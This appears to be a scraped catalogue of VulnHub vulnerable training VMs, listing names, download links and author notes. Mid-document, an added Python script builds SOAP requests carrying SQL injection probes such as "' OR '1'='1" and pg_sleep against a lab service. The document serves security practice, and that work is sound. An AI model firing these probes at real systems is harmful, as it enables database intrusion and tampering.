Kevgir has been designed by the canyoupwnme team for training, hacking practice and exploitation. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announce that. Have fun!

Default username:pass =>

MD5: 75DAD90BC1B57A166D640B83C7BAA7DC | SHA1: 38E12F8DC93F519C6F716EAC6BEE1632BC199811
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Csharp: VulnJson
Released: 4 Jan 2016 | Author: Brandon Perry | Series: Csharp | Size: 1.9 GB
Download: https://download.vulnhub.com/csharp/CsharpVulnJson.ova

The CsharpVulnJson virtual appliance is a purposefully vulnerable web application, focusing on HTTP requests using JSON to receive and transmit data between the client and the server. The web application, listening on port 80, allows you to create, find, and delete users in the PostgreSQL database. The web application is written in the C# programming language, uses apache+mod_mono to run, and is, at the very least, exploitable by XSS and SQL injections.

The SQL injections yield a variety of potential exploit techniques since different SQL verbs are used to perform actions against the server. For instance, a SQL injection in an INSERT statement may not be exploitable in the same ways the DELETE or SELECT statements will be. Using a tool like sqlmap will help you learn how to exploit each SQL injection vulnerability using a variety of techniques. If you are curious how sqlmap is performing the checks for, and ultimately exploiting, the vulnerabilities in the web application, you can use the --proxy option for sqlmap and pass the HTTP requests through Burp Suite. You can then see in the HTTP history tab the raw HTTP requests made by sqlmap.

MD5: D3939E812102368EC34F92C30EA2CBED | SHA1: F3FD7B4C043681EFDFE3F6B70964A2B8F2E86FF7
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
FristiLeaks: 1.3
Released: 14 Dec 2015 | Author: Ar0xA | Series: FristiLeaks | Size: 668 MB
Download: https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova

VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

MD5: 206C9D1C0F29248CB3EC1873A56E4940 | SHA1: 4AB71D307E6D9AA3CEFE7547DDC1F987D738C596
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
PRIMER: 1.0.1
Released: 15 Jan 2016 | Author: Arne Rick | Series: PRIMER | Size: 640 MB
Download: https://download.vulnhub.com/primer/PRIMER.tar

1) Run the OVA in a VM and connect to the webserver
2) Have Fun!

Credits: couchsofa, morbidick, einball, sarah (I would probably never have finished this project without you guys 😉); mostley, for hinting me to Erik Österberg's Terminal.js; 0xBEEF, for providing fuel in the form of fudge and premium grilled goods.

More information: http://wiki.fablab-karlsruhe.de/doku.php?id=projekte:primer

A friend wanted to get into some simple exploits. I suggested starting out with web security; she was all for it. But when I started browsing VulnHub and the likes I couldn't find anything like I had in mind. So I wrote my own. This is a story-based challenge written in a style heavily inspired by Neal Stephenson's Snow Crash and William Gibson's Sprawl Trilogy. Each chapter is unlocked by solving the puzzle: from hardcoded clear-text JavaScript password checks, SQL injections and cracking hashes to a simulated terminal. You only need to start the VM; a webserver will come up and you can connect with your browser. In fact you never have to leave the browser.

Teach some basic well-known techniques and attacks. Spark some curiosity; make the user look at the source code and try to figure out what's going on behind the scenes. The main goal is to give a nice welcoming intro to the scene and hopefully also teach something about ethics and responsibility.

v1.0.1 - 2016-01-15: https://twitter.com/CouchSofa/status/688129147848138752
v1.0.0 - 2015-10-27: https://twitter.com/CouchSofa/status/659148660152909824

Username: nieve
Password: PRIMER

MD5: D0233F6D0FDE41A56925E8FEF29902CA | SHA1: 5315D9856A1F52E491D65F10417015CB1986C60C
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
SickOs: 1.1
Released: 11 Dec 2015 | Author: D4rk | Series: SickOs | Size: 623 MB
Download: https://download.vulnhub.com/sickos/sick0s1.1.7z

MD5: 396E46897C54DA6DED6604B861C806B7 | SHA1: 3578A10BA92F860C2F0D8934EC5A9BBFFC4C7859
Format: Virtual Machine (VMware) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Acid: Reloaded
Released: 1 Sep 2015 | Author: Avinash Kumar Thapa | Series: Acid | Size: 1006 MB
Download: https://download.vulnhub.com/acid/Acid-Reloaded.7z

The name of the virtual machine is "Acid-Reloaded". This virtual machine contains both network logic and web logic. I have added a new concept here; let's see how many of you think more logically. 😃

You need to extract the rar and run the vmx using VMplayer. The machine has DHCP active, so once it has automatically been assigned an IP address on the network, the next step will be to identify the target and discover the service(s) to start the game. Escalate privileges to the root user and capture the flag. Once anyone is able to beat the box, shoot me a mail.

Note, do not use any local methods - including logging in as the 'Guest' user on the guest OS.

MD5: 9EF7460E94A59D9F4553B3DA364F82B5 | SHA1: 5FF8EC8F44394FF9CAB9D3A9670B27DC1054157D
Format: Virtual Machine (VMware) | OS: Linux | DHCP: Enabled | IP: Automatically assign
Csharp: VulnSoap
Released: 4 Jan 2016 | Author: Brandon Perry | Series: Csharp | Size: 1.8 GB
Download: https://download.vulnhub.com/csharp/CsharpVulnSoap.ova

The CsharpVulnSoap virtual appliance is a purposefully vulnerable SOAP service, focusing on using XML, which is a core feature of APIs implemented using SOAP. The web application, listening on port 80, allows you to list, create, and delete users in the PostgreSQL database. The web application is written in the C# programming language and uses apache+mod_mono to run. The main focus of intentional vulnerabilities was SQL injections.

The vulnerable SOAP service is available on http:///Vulnerable.asmx, and by appending ?WSDL to the URL, you can get an XML document detailing the functions exposed by the service. Using this document, you can automatically fuzz the endpoint for any vulnerabilities by parsing the document and creating the HTTP requests expected programmatically. The SQL injections yield a variety of potential exploit techniques since different SQL verbs are used to perform actions against the server. For instance, a SQL injection in an INSERT statement may not be exploitable in the same ways the DELETE or SELECT statements will be. Using a tool like sqlmap will help you learn how to exploit each SQL injection vulnerability using a variety of techniques. If you are curious how sqlmap is performing the checks for, and ultimately exploiting, the vulnerabilities in the web application, you can use the --proxy option for sqlmap and pass the HTTP requests through Burp Suite. You can then see in the HTTP history tab the raw HTTP requests made by sqlmap.

MD5: C4E9BC90C4B25014C99A545B69DDCC3F | SHA1: 3CDBFA9ABB24F2FC69AA1A556C9A2B4DFA24DA44
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
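The description above says the WSDL can drive automatic fuzzing: parse the document for the operations and their parameters, then build the SOAP requests the service expects. The following is an added example, not code from Brandon Perry or from the CsharpVulnSoap appliance, and it sends nothing: the WSDL it parses is a constructed stand-in in the .asmx style (the real document comes from Vulnerable.asmx?WSDL on the VM, whose address the page leaves out), the operation and parameter names in it are invented, and the payloads are ordinary first-pass SQL injection probes. It yields one SOAP 1.1 request per (operation, parameter, payload) with headers and body ready to POST, and XML-escapes the payload so that a probe containing & or < cannot break the envelope before it reaches the SQL layer.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Iterator, List, Tuple
from xml.sax.saxutils import escape

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
XSD_NS = "http://www.w3.org/2001/XMLSchema"
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed stand-in for what Vulnerable.asmx?WSDL might return. It follows
# the .asmx convention: each operation's request element carries the
# operation's name and lists the parameters as typed child elements.
SAMPLE_WSDL = """<wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
    xmlns:s="http://www.w3.org/2001/XMLSchema" targetNamespace="http://tempuri.org/">
  <wsdl:types>
    <s:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/">
      <s:element name="AddUser"><s:complexType><s:sequence>
        <s:element name="username" type="s:string"/>
        <s:element name="password" type="s:string"/>
      </s:sequence></s:complexType></s:element>
      <s:element name="DeleteUser"><s:complexType><s:sequence>
        <s:element name="username" type="s:string"/>
      </s:sequence></s:complexType></s:element>
      <s:element name="ListUsers"><s:complexType/></s:element>
    </s:schema>
  </wsdl:types>
  <wsdl:portType name="VulnerableSoap">
    <wsdl:operation name="AddUser"/>
    <wsdl:operation name="DeleteUser"/>
    <wsdl:operation name="ListUsers"/>
  </wsdl:portType>
</wsdl:definitions>
"""

# First-pass SQL injection probes of the kind sqlmap starts with (PostgreSQL
# flavoured, since the page says the backend is PostgreSQL).
PAYLOADS = ["' OR '1'='1", "'; SELECT pg_sleep(5)--", "x'||(SELECT version())||'"]


def parse_wsdl(wsdl_text: str) -> Tuple[str, Dict[str, List[str]]]:
    """Return (target namespace, {operation: [parameter names]})."""
    root = ET.fromstring(wsdl_text)
    tns = root.get("targetNamespace")
    wrappers = {}  # request element name -> its leaf parameter names
    for el in root.iter(f"{{{XSD_NS}}}element"):
        if el.get("type") is not None:
            continue  # a leaf parameter, collected from its wrapper below
        wrappers[el.get("name")] = [
            leaf.get("name") for leaf in el.iter(f"{{{XSD_NS}}}element")
            if leaf is not el and leaf.get("type") is not None
        ]
    ops = {}
    for op in root.iter(f"{{{WSDL_NS}}}operation"):
        ops.setdefault(op.get("name"), wrappers.get(op.get("name"), []))
    return tns, ops


def soap_request(tns: str, operation: str, values: Dict[str, str]) -> Tuple[Dict[str, str], str]:
    """Build (HTTP headers, SOAP 1.1 body). Values are XML-escaped so a payload
    with & or < stays inside its element instead of breaking the envelope;
    quotes, which the SQL probes rely on, need no escaping in element text."""
    fields = "".join(f"<{k}>{escape(v)}</{k}>" for k, v in values.items())
    body = ('<?xml version="1.0" encoding="utf-8"?>'
            f'<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body>'
            f'<{operation} xmlns="{tns}">{fields}</{operation}>'
            '</soap:Body></soap:Envelope>')
    headers = {"Content-Type": "text/xml; charset=utf-8",
               "SOAPAction": f'"{tns}{operation}"'}
    return headers, body


def fuzz_requests(wsdl_text: str, payloads: List[str] = PAYLOADS,
                  filler: str = "test") -> Iterator[Tuple[str, str, str, Dict[str, str], str]]:
    """One request per (operation, parameter, payload); other parameters get filler."""
    tns, ops = parse_wsdl(wsdl_text)
    for op, params in ops.items():
        for target in params:
            for payload in payloads:
                values = {p: (payload if p == target else filler) for p in params}
                headers, body = soap_request(tns, op, values)
                yield op, target, payload, headers, body


def count_requests(wsdl_text: str, payloads: List[str] = PAYLOADS) -> int:
    return sum(1 for _ in fuzz_requests(wsdl_text, payloads))


if __name__ == "__main__":
    # The VM's address is not given on the page; fill it in before sending.
    endpoint = "http://<vm-ip>/Vulnerable.asmx"
    for op, param, payload, headers, body in fuzz_requests(SAMPLE_WSDL):
        print(f"POST {endpoint}  {headers['SOAPAction']}  {param} <- {payload!r}")
    # To watch the traffic in Burp's HTTP history, as the page suggests for
    # sqlmap, send each body with urllib through a ProxyHandler for 127.0.0.1:8080.
```

Parameterless operations such as ListUsers produce no requests, which is correct for parameter injection but a reminder that a SELECT-backed operation can still be reached through the others (the page's point about INSERT, DELETE and SELECT being injectable in different ways).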
NullByte: 1
Released: 1 Aug 2015 | Author: ly0n | Series: NullByte | Size: 954 MB
Download: https://download.vulnhub.com/nullbyte/NullByte.ova.zip

Codename: NB0x01
Download: ly0n.me/nullbyte/NullByte.ova.zip
Objective: Get to /root/proof.txt and follow the instructions.
Level: Basic to intermediate.
Description: Boot2root, box will get IP from DHCP, works fine with VirtualBox & VMware.
Hints: Use your lateral thinking skills, maybe you'll need to write some code.

MD5: 1D38B727B359B38466580839790C428F | SHA1: 1AA5CC0618EE33B43E5B65ACD0467901898CF53B
Format: Virtual Machine (Virtualbox - OVA) | OS: Linux | DHCP: Enabled | IP: Automatically assign
TopHatSec: Freshly
Date: 18 Feb 2015
Author: TopHatSec
Series: TopHatSec
Size: 863 MB
Download: https://download.vulnhub.com/tophatsec/Freshly.ova

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 😃 There are a couple of different ways that you can go with this one. Good luck! Simply download and import the OVA file into virtualbox!

You may have issues when importing to VMware. If this is the case, extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

MD5: 7F9B6DEFEF069D44031D1FAE2FDC461A
SHA1: D84D70645B35B81B6566577933A610F899D26229
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
TopHatSec: FartKnocker
Date: 6 Mar 2015
Author: TopHatSec
Series: TopHatSec
Size: 593 MB
Download: https://download.vulnhub.com/tophatsec/FartKnocker.ova

New VM challenge that should be fun for people trying to get into packet analysis! There are several steps to this box. I created it with virtualbox. The VM is built on: Ubuntu 14.04 32 bit. If you beat the box then please shoot me an email! Have fun guys! P.S. I got the word “Fart Knocker” from watching beavis and butthead back in the day. Otherwise you kids might not understand 😃

You may have issues when importing to VMware. If this is the case, extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

MD5: 0640BEAB0D41BA88FB98337AEDF0E2F9
SHA1: 44202E69FAB428EE13039D274037CF8C9DDD6832
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Acid: Server
Date: 15 Aug 2015
Author: Avinash Kumar Thapa
Series: Acid
Size: 1.1 GB
Download: https://download.vulnhub.com/acid/Acid.rar

Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. The name of the Virtual machine is " r". This Virtual Machine is completely . I have added a little new concept here and hope people will enjoy solving this. You need to extract the and run the using . The machine has active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game. Escalate the privileges to root and capture the flag. Once anyone is able to beat the machine then please let me know.
Twitter:
LinkedIn:

MD5: 96A4E4D0F9BDCADB4A0011DA1D5ED64F
SHA1: C31DA966F12AC18457FBC1BFA2B02ED1DF0E16E3
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Flick: 2
Date: 20 Aug 2015
Author: Leonjza
Series: Flick
Size: 566 MB
Download: https://download.vulnhub.com/flick/flickII.zip

Welcome! Your challenge, should you choose to accept, is to gain root access on the server! The employees over at Flick Inc. have been hard at work prepping the release of their server checker app. Amidst all the chaos, they finally have a version ready for testing before it goes live. You have been given a pre-production build of the Android .apk that will soon appear on the Play Store, together with a VM sample of the server that they want to deploy to their cloud hosting provider. The .apk may be installed on a phone (though I won’t be offended if you don’t trust me ;]) or run in an android emulator such as the Android Studio (https://developer.android.com/sdk/index.html). Good Luck!

$ shasum *
e74061c5348fef33d00f5f4f2aee9e921c591129 flick-check-dist.apk
e6fbcd5aab5ed95c54d02855fdfbad74587f3db7 flickII-dist.ova

Note: Vmware will complain about the OVF specification. Just click retry on the import and everything should be ok!
Shouts:

Exclusive to VulnHub!

MD5: ED794C697A2F5681DC60DCE14759897F
SHA1: 2DBC54908862CB5B0D43C613AFB7E5100DA5DE02
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Brainpan: 3
Date: 27 Jul 2015
Author: superkojiman
Series: Brainpan
Size: 647 MB
Download: https://download.vulnhub.com/brainpan/brainpan3.zip

By using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software. TL;DR: If something bad happens, it’s not my fault.

Brainpan 3 has been tested and found to work with VMware Player, VMware Fusion, and Virtual Box. Check to make sure Brainpan_III.ova has following checksums so you know your download is intact:
MD5 : 170e0d8b26ab721587537fcde69087a0
SHA1: ed9ae53c556a1ce6988b3a54621dd6469c8b8aa5

Import Brainpan_III.ova into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it’s recommended you run it within a NAT or visible to the host OS only since it is vulnerable to attacks. Get root and get the flag.

Exclusive to VulnHub!

MD5: 50DCAB37A3767B055E7CB09F06C739FE
SHA1: F25EE3545F4B51914660195FF4CF791BD35470C8
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
TopHatSec: ZorZ
Date: 18 Feb 2015
Author: TopHatSec
Series: TopHatSec
Size: 645 MB
Download: https://download.vulnhub.com/tophatsec/Zorz.ova

ZORZ is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward. I have explained as much as I can in the readme file:

Welcome to the ZorZ VM Challenge. This machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see!) If you solve one or all three pages, please send me an email and quick write up on how you solved each challenge. Your goal is to successfully upload a webshell or malicious file to the server. If you can execute system commands on this box, that’s good enough!!! I hope you have fun!

You may have issues when importing to VMware. If this is the case, extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

MD5: 05262CC7348EA21D78AFE97B3894BE96
SHA1: B19F01A69380AB141705921880BBA23DBF26D25F
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
ROP Primer: 0.2
Date: 13 Jun 2015
Author: Bas
Series: ROP Primer
Size: 598 MB
Download: https://download.vulnhub.com/rop-primer/rop-primer-v0.2.ova

Our resident ROP ninja recently gave the team a bootcamp on Return Oriented Programming. The presentation was followed by a demo walkthrough on writing a ROP exploit on a vulnerable application. Since the presentation was well received, he’s decided to make the slides available to everyone. You can view them at . We hope you enjoy it!

Exclusive to VulnHub!

Release dates:
v0.1 = 04/03/2015
v0.2 = 13/06/2015

Don’t forget to check the web server for more information!

MD5: 840C75497F54578497A6E44DF2F96047
SHA1: 2CB14D78FD1FF7B5A7895447969FDE8CA9C06EF3
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
/dev/random: Pipe
Date: 2 Oct 2015
Author: Sagi-
Series: /dev/random
Size: 572 MB
Download: https://download.vulnhub.com/devrandom/pipe.ova

MD5: 3D54F3D0DCE62A00B8F152E8C1513E07
SHA1: 43688498287762221A3DBAE0F264B9503064DBB4
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
/dev/random: Sleepy
Date: 2 Oct 2015
Author: Sagi-
Series: /dev/random
Size: 699 MB
Download: https://download.vulnhub.com/devrandom/sleepy.ova

Exclusive to VulnHub!

You will need to use your own Windows XP .ISO to create the target in order to attack. You can use any version of Windows to generate the image, but you need to supply it a valid Windows XP CD during the creation stage. Please see https://blog.vulnhub.com/introducing-vulninjector/ for more information. VulnInjector requires .NET framework version 4 or higher to be installed.

MD5: 2B8B09800A157E4E912F370F5DA03D5D
SHA1: 9BA1A0366A53073CF4C7CF5B221313FDE6D1126F
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: Play XML Entities
Date: 7 Apr 2015
Author: Pentester Lab
Series: Pentester Lab
Size: 295 MB
Download: https://download.vulnhub.com/pentesterlab/play_xxe.iso

This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism.

MD5: E25EF4BCF32F0C8A8763410AAB92AFDC
SHA1: A2825FE28A6CC30FFE2FA5F1CD6023F3ECC50C4F
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Darknet: 1.0
Date: 2 May 2015
Author: q3rv0
Series: Darknet
Size: 328 MB
Download: https://download.vulnhub.com/darknet/Darknet.rar

Darknet has a bit of everything, a sauce with a touch of makeup and frustration that I hope will lead to hours of fun for migraines and whoever dares to conquer its chambers. Once the target is compromised, read the contents of the file /root/flag.txt, obviously after escalating the privileges necessary to accomplish the task. The image can be mounted with VirtualBox. The machine has DHCP active, so once it is automatically assigned an IP on the network, the next step will be to identify the target and discover the service(s) to start the game. Good luck! If you want to send solutions in PDF format, you can do so at the following address: s3csignal [at] gmail [dot] com

The hard disk may quickly fill up if you’re using automated tools, making the virtual machine defunct. May have issues importing into VMware.

MD5: 1875810592F2F5354486FBFEACBA3A6C
SHA1: 014B32B2C0E2BEEF09DCE8AA0FFE4111A6E7FA3A
Format: Virtual Machine (Virtualbox - VDI)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Underdist: 3
Date: 29 Nov 2014
Author: q3rv0
Series: Underdist
Size: 532 MB
Download: https://download.vulnhub.com/underdist/Underdist-3.zip

Underc0de Weekend is a weekly challenge we (underc0de) are doing. The goal is to be the first to resolve it, to earn points and prizes (http://underc0de.org/underweekend.php). Enjoy

MD5: AA672F50EF2FDDAE5B3B6E9B9E7B4655
Format: Virtual Machine (Virtualbox - VDI)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Tr0ll: 2
Date: 24 Oct 2014
Author: Maleus
Series: Tr0ll
Size: 350 MB
Download: https://download.vulnhub.com/tr0ll/Tr0ll2.rar

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! 😃 Difficulty is beginner++ to intermediate. The VM should pull a valid IP from DHCP. This VM has been verified to work on VMware workstation 5, VMware player 5, VMware Fusion, and Virtual box. Virtual box users may need to enable the additional network card for it to pull a valid IP address. Special thanks to @Eagle11, @superkojiman and @leonjza for suffering through the testing and the members of #overflowsec on freenode for giving me ideas. If you have issues with the machine, feel free to contact me at @Maleus21 or maleus
-Maleus
www.overflowsecurity.com

Tr0ll2.rar = VMware, Tr0ll2_vbox.rar = VirtualBox

MD5: A6E6DDD130AC78EAC2AA1B0BF425C333
SHA1: F7536D74820924B5E3E148E60B7DAFCE25341A27
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
OwlNest: 1.0.2
Date: 1 Sep 2014
Author: Swappage
Series: OwlNest
Size: 633 MB
Download: https://download.vulnhub.com/owlnest/OwlNest_v1.0.2.ova

Welcome to The Owl Nest. Owls are lovely but hate you 😃 and maybe after this one, you will hate them too.

Notes from the author: I hope you will enjoy this game, I spent a fairly high amount of effort to build this, in an attempt to make the game funny, and provide an average amount of frustration to the players 😃 Even if the machine was tested, maybe there are shortcuts to reach the flag… hopefully not 😃 Expect some curve balls 😃 Special thanks goes to Barrebas for testing the VM.
Swappage

Was used at ESC 2014 CTF

MD5: 769455FC71081955FBCBA3BE291E7A6D
SHA1: 24B3C3BA430223207CF81DABF7D738B3F9238E4D
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pandora's Box: 1
Date: 4 Jan 2015
Author: c0ne
Series: Pandora's Box
Size: 497 MB
Download: https://download.vulnhub.com/pandora/pb0x_ova.rar

MD5: 027CD0F768D32D854AA6BF8573A5D742
SHA1: D0897CDC48220B2DB408AB557FD31D81F317DB74
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: CVE-2014-6271: ShellShock
Date: 25 Sep 2014
Author: Pentester Lab
Series: Pentester Lab
Size: 20 MB
Download: https://download.vulnhub.com/pentesterlab/cve-2014-6271.iso

Quickly created an exercise for cve-2014-6271:
Source:

MD5: 1050E29F4A3FC7266FC5888A202F516B
SHA1: 5F4AF13036F09DDE4A4512198F2A795B471ECC78
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
The Frequency: 1
Date: 7 Jan 2015
Author: strata
Series: The Frequency
Size: 296 MB
Download: https://download.vulnhub.com/thefrequency/TheFrequency.ova

Note, you may have issues running this depending on your host hardware. This is due to the guest OS being OpenBSD, and it being a bit more ‘picky’ on what it will run on when it’s been virtualized.

MD5: F14F49F8F8DDF6752C9FB6F9740ECFA4
SHA1: 45798DB52BFED342DC91A05A444434ACA1514698
Format: Virtual Machine (Virtualbox - OVA)
Operating System: BSD
DHCP service: Enabled
IP address: Automatically assign
The Purge: 1
Date: 3 Jan 2015
Author: strata
Series: The Purge
Size: 527 MB
Download: https://download.vulnhub.com/thepurge/ThePurge.ova

MD5: 0F31214DA7CCBA8B91B53764EA2FC09C
SHA1: 5C357BC7FDCC4F9C7BD4280ECDC375C32310103F
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Persistence: 1
Date: 7 Sep 2014
Author: Sagi- & superkojiman
Series: Persistence
Size: 553 MB
Download: https://download.vulnhub.com/persistence/persistence-1.0.tgz

By using this virtual machine, you agree that in no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software. TL;DR - You are about to load up a virtual machine with vulnerabilities created by hackers. If something bad happens, it’s not our fault.

Persistence aims to provide you with challenging obstacles that block your path to victory. It is perhaps best described by quotes made by some famous people:
“A little more persistence, a little more effort, and what seemed hopeless failure may turn to glorious success.” - Calvin Coolidge
“Energy and persistence conquer all things.” - Benjamin Franklin
“Persistence and resilience only come from having been given the chance to work through difficult problems.” - Gever Tulley

Get a root shell and read the contents of /root/flag.txt to complete the challenge! The virtual machine will get an IP address via DHCP, and it has been tested on the following hypervisors:
VMware Fusion 6
VMware Player 6
VMware Workstation 10
VirtualBox 4.3

Thanks @VulnHub for kindly hosting this challenge, and thanks to @recrudesce for testing it and providing valuable feedback!

Exclusive to VulnHub!
Blog post: http://blog.vulnhub.com/2014/09/competition-persistence.html

MD5: 0C68A77ABD4A9A35BB89340343816089
SHA1: D38FD05178E889FAAC75C39FA5A5B937B8117D60
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Sokar: 1
Date: 30 Jan 2015
Author: Rasta Mouse
Series: Sokar
Size: 351 MB
Download: https://download.vulnhub.com/sokar/sokar.tar.gz

Exclusive to VulnHub!
Blog post: http://blog.vulnhub.com/2015/01/competition-sokar.html

MD5: 4FB5A6054E5D1E97D73A4820CC9B6FE4
SHA1: 0DDC099FCC50A5F9D2D31EAF3918D3373AECAA33
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Knock-Knock: 1.1
Date: 12 Oct 2014
Author: zer0w1re
Series: Knock-Knock
Size: 620 MB
Download: https://download.vulnhub.com/knockknock/knock-knock-1-1.ova

Pretty much thought of a pretty neat idea I hadn’t seen done before with a VM, and I wanted to turn it into reality! Your job is to escalate to root, and find the flag. Since I’ve gotten a few PMs, remember: There is a difference between “Port Unreachable” and “Host Unreachable”. DHCP is not broken 😉 Gotta give a huge shoutout to c0ne for helping to create the binary challenge, and rasta_mouse and recrudesce for testing 😃 Also, gotta thank barrebas who was able to find a way to make things easier… but of course that is fixed with this update! 😉
MD5 – 3b6839a28b4be64bd71598aa374ef4a6 knock-knock-1-1.ova
SHA1 – 0ec29d8baad9997fc250bda65a307e0f674e4180 knock-knock-1-1.ova
Feel free to hit me up in #vulnhub on freenode – zer0w1re

MD5: 3B6839A28B4BE64BD71598AA374EF4A6
SHA1: 0EC29D8BAAD9997FC250BDA65A307E0F674E4180
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Kvasir: I
Date: 17 Oct 2014
Author: Rasta Mouse
Series: Kvasir
Size: 1.8 GB
Download: https://download.vulnhub.com/kvasir/kvasir1.tar

Kvasir 1
Filename: kvasir1.ova
MD5: e987e8bbe319db072246ab749912ea91
SHA1: 029a59188cd3375fa50a5115db561f8a8ef69d4a
Author: Rasta Mouse
Testers: Barrebas & OJ

Notes to the Player: As part of the challenge, Kvasir utilises LXC to provide kernel isolation. When the host VM boots, it can take a little bit of time before the containers become available. It is therefore advised to wait 30-60 seconds after the login prompt is presented, before attacking the VM. A few other pointers:

MD5: 2ED49BB79F9FB71976B6E8EEC78C7E6D
SHA1: 9C725DA9FC6013A5EB376AF85F14287DCF18F527
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pegasus: 1
Date: 16 Dec 2014
Author: Knapsy
Series: Pegasus
Size: 844 MB
Download: https://download.vulnhub.com/pegasus/pegasus.ova

Pegasus. Welcome to my first boot2root VM! Inspired by various CTF events I took part in and by a couple of cool concepts I learnt in the last couple of months. Rules of engagement are simple - find a way in, escalate your privileges all the way up to the root and get the flag! As with all VMs like this, think outside the box, don’t jump to conclusions too early and “read between the lines” 😃 The VM has been tested on VMWare and VirtualBox, just import it, ensure the network is set as “Host Only” and run it. It should pick up the IP address automatically. Enjoy! 😃

MD5: 5046E330FF42E9ADEE0A42B63694CBFE
SHA1: F18B7437CA3C96F76A2E1B06F569186B63567DD5
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
SkyTower: 1
Date: 26 Jun 2014
Author: Telspace
Series: SkyTower
Size: 290 MB
Download: https://download.vulnhub.com/skytower/SkyTower.zip

Welcome to SkyTower:1. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”. You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you. We encourage you to try it out for yourself first, give yourself plenty of time and then only revert to the Walkthroughs below. Enjoy!
Telspace Systems
@telspacesystems

MD5: 4A3352251DEE384B4E4775CE35201856
SHA1: 462801C374CF77F600ED7F4C06D683F230B71748
Format: Virtual Machine (Virtualbox - VDI)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Morning Catch: Phishing Industries
Date: 6 Aug 2014
Author: Strategic Cyber LLC
Series: Morning Catch
Size: 1.4 GB
Download: https://download.vulnhub.com/morningcatch/morningcatch.zip

Morning Catch is a VMware virtual machine, similar to Metasploitable, to demonstrate and teach about targeted client-side attacks and post-exploitation.

